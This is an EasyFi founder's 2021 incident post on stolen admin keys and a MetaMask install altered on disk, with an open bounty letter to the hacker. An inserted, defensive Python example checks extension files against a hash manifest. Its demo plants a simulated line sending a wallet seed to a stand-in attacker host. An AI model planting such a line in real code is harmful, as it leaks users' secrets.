EasyFi Security Incident. Pre-Post Mortem

Ankitt Gaur
Published in EasyFi Network
3 min read, Apr 19, 2021

This post will be updated as and when more information becomes available

Background

On Monday, 19th April at 10:40:26 AM UTC, I was informed by teammates about large transfers of EASY tokens from EasyFi official wallets to some unknown wallets on the Ethereum network and the Polygon network. These transactions quickly brought to my attention a possible compromise of admin keys or mnemonic keys, since the machine used for the purpose had not been in use for at least a week and was completely offline. Responding quickly to the event, I took all the necessary precautions and actions to curtail the losses.

By the time I managed to get my hands on the computer, the hacker had managed to get access to admin keys, remove existing liquidity to the tune of $6 million from protocol pools in USD / DAI / USDT, and transfer 2.98 million EASY tokens to this wallet address: 0x83a2EB63B6Cc296529468Afa85DbDe4A469d8B37, which is alleged to belong to the hacker.

This is a mnemonic key hack. The EasyFi smart contracts were not exploited; only the mnemonic phrase/admin keys were compromised from MetaMask under a planned remote attack, which was used to drain liquidity from the protocol. The physical machine was not tampered with, and it seems to be an issue with some remote access, similar to what might have been previously used against Hugh Karp.

Targeted Attack

In what we believe is a targeted attack, we are investigating thoroughly to arrive at a factual conclusion and act on it. Since the machine was not used for daily operations and was used solely for official transfers, the hacker waited for the right time to execute the hack in a well-planned manner. We’ll update and share more information on this as it becomes available.

Summary

While most MetaMask attacks phish private keys / mnemonic phrases by tricking users into downloading a malicious version, this is not the case here. My computer was compromised and MetaMask was altered on the disk.
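One check a practitioner would run after a notice like this, as an added example that is not EasyFi's or MetaMask's own code: hash every file of the installed extension directory and compare it against a trusted manifest, in practice taken from the signed release or a clean install on another machine. Here a constructed directory stands in for the extension, and the file names, contents and the simulated tamper are all assumptions for the demo.

```python
"""Added example (not EasyFi's or MetaMask's code): detect on-disk tampering of a
browser extension by comparing a directory tree against a trusted SHA-256 manifest.
All paths and file contents below are constructed for the demo."""
import hashlib
import tempfile
from pathlib import Path


def hash_tree(root):
    """Return {relative_posix_path: sha256_hex} for every regular file under root."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        digest = hashlib.sha256()
        with path.open("rb") as fh:
            for chunk in iter(lambda: fh.read(65536), b""):
                digest.update(chunk)
        manifest[path.relative_to(root).as_posix()] = digest.hexdigest()
    return manifest


def compare_manifests(trusted, observed):
    """Classify differences between a trusted manifest and what is on disk now:
    files whose content changed, files that appeared, files that disappeared."""
    modified = sorted(p for p in trusted if p in observed and trusted[p] != observed[p])
    added = sorted(p for p in observed if p not in trusted)
    removed = sorted(p for p in trusted if p not in observed)
    return {"modified": modified, "added": added, "removed": removed}


def demo():
    """Build a fake extension tree, baseline it, tamper with it, and report the diff.
    The wallet script, the exfiltration stub and the dropped file are constructed."""
    with tempfile.TemporaryDirectory() as tmp:
        ext = Path(tmp) / "extension"
        (ext / "scripts").mkdir(parents=True)
        (ext / "manifest.json").write_text('{"name": "wallet", "version": "1.0.0"}\n')
        (ext / "scripts" / "background.js").write_text(
            "const seed = vault.decrypt(password);\n"
        )
        trusted = hash_tree(ext)  # baseline taken from the clean install

        # Simulated tamper: exfiltration appended to the wallet script, extra file dropped.
        with (ext / "scripts" / "background.js").open("a") as fh:
            fh.write("fetch('https://attacker.invalid/?s=' + seed);\n")
        (ext / "scripts" / "inject.js").write_text("// dropped by attacker\n")

        return compare_manifests(trusted, hash_tree(ext))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The caveat that matters for an incident like the one described here: if the attacker already has code execution on the signing machine, the baseline, the checker and MetaMask's own update mechanism can all be altered together, so the trusted manifest and the comparison belong on a separate machine, and a diff of a single extension directory says nothing about a keylogger or remote-access tool elsewhere on the host.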

My machine was compromised and we are working with experts to run full diagnostics. This remains a work in progress.

From the initial investigations, it looks like the hackers are extremely sophisticated and quite likely working as part of a larger group. We are continuing our investigations and shall share more information as it becomes available.

To our community members

I would like to thank you for the support you have shown in this tough time. We are constantly working with our team & technical experts to bring about a plausible solution to make good the losses that happened from the hack. We cannot promise anything at this stage, but rest assured we are working in the best interest of our community members. We value your support and urge you to be patient for the next few days, as we need time to collate data related to all the user accounts and come up with a strategy to compensate accordingly.

We have contacted the Binance and AscendEx teams, who have assisted us with suspending withdrawals/deposits of EASY tokens. Due to that, the hacker has not actually moved the tokens from the wallet and is not able to sell any significant amount on DEXes due to liquidity constraints.

Open Letter to the Hacker

You’ve used very sophisticated techniques to steal a lot of funds from the EasyFi community. EasyFi is a very new project which has received a lot of love & support from its users, being one of the early movers on the layer 2 Polygon network.

We are still at a very early stage and not in a position to make good all the losses in a personal capacity. We care for our community and shall do everything possible at our end to make good all the losses that happened to our users from this theft. We are in great shock and, we believe, so are our users who have relied on & supported us since inception.

As the founder of the project, I would urge you to be thoughtful of the hard work that has gone into building EasyFi so far. I request you to consider returning all funds and discussing the possibility of an appropriate bounty to avoid all legal trouble in the future. We can consider a clean payout of 1M USD to a white-hat hacker and not attempt any legal proceedings regarding this incident.

Ankitt
